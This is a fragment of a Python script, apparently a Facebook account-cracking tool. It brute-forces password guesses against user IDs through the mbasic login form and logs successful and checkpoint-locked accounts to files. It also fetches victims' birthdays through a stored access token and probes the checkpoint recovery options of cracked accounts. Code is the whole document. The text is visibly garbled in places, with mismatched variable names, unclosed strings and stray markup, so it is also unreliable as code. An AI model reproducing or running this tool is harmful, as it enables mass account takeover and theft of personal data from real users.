sys.stdout.write(f"\r{B}[•] BAZ > {P} {loop}/{len(id)} {H}OK : {H}{len(ok)} {K}CP : {K}{len(cp)}");sys.stdout.flush()
for pw in fii:
fii_gtg = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip,
deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/appg,*/*;q=0.8", "user-agent": ua, "Host":
"mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-
requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mobile.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:fii_gtg.update({i.get("name"):i.get("value")})
else:continue
except:pass
fii_gtg.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","fb_noscript": "true"})
deku = ses.post("https://mobile.facebook.com/login/device-based/regular/login/?
refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=fii_qtq)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (",").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print(f"\r{B}----> {H}{uid}•{pw}")
ok.append("%s|%s"%(uid, pw))
```

```
open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open('login/token.json','r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
with requests. Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan ttl[month]
print(f"\r{B} \mid ---> \{H\}\{uid\} \bullet \{pw\} \bullet \{day\} \{month\} \{year\}")
cp.append("%sl%s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
except (KeyError, IOError):
day = (" ")
month = ("
year = (" ")
except:pass
print(f"\r{B}----> {H}{uid}•{pw}")
cp.append("%s|%s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
def cek_log(uid,pw,ua):
mb = ("https://mbasic.facebook.com")
ses = requests.Session()
option = []
ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type":
"application/x-www-form-urlencoded", "user-agent": ua, "accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-
with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document", "referer": mb+"/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
data = {}
qed = parser(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers=("user-agent":ua)).text, "html.parser")
fm = ged.find("form",{"method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":uid,"pass":pw})
run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
if "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
jzst = form.find("input",{"name":"jazoest"})["value"]
nh = form.find("input",{"name":"nh"})["value"]
dataD = {"fb_dtsq": dtsq,"fb_dtsq": dtsq,"jazoest": jzst,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
tempek = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in tempek.find_all("option")]
print(f"\r{P}[•]{H}----> {B}{uid}•{pw}")
for opt in range(len(ngew)):
jalan(f"{U}[{B}{str(opt+1)}{U}]{B}>>>>{U}[{B}{ngew[opt]}{U}]")
if "0" in str(len(ngew)):
jalan(f"{P}[•]{I} Hore akunya tab yesss, silahkan di login ")
elif "login_error" in str(run):
jalan(f^{"}\r{P}[\bullet]{H}--->{B}\{uid\}\bullet{pw}")
jalan(f"\r{P}[•]{H}----> {B}{uid}•{pw}")
if __name__=="__main__":
   os.system("clear")
  mkdir_data_login()
  menu()
```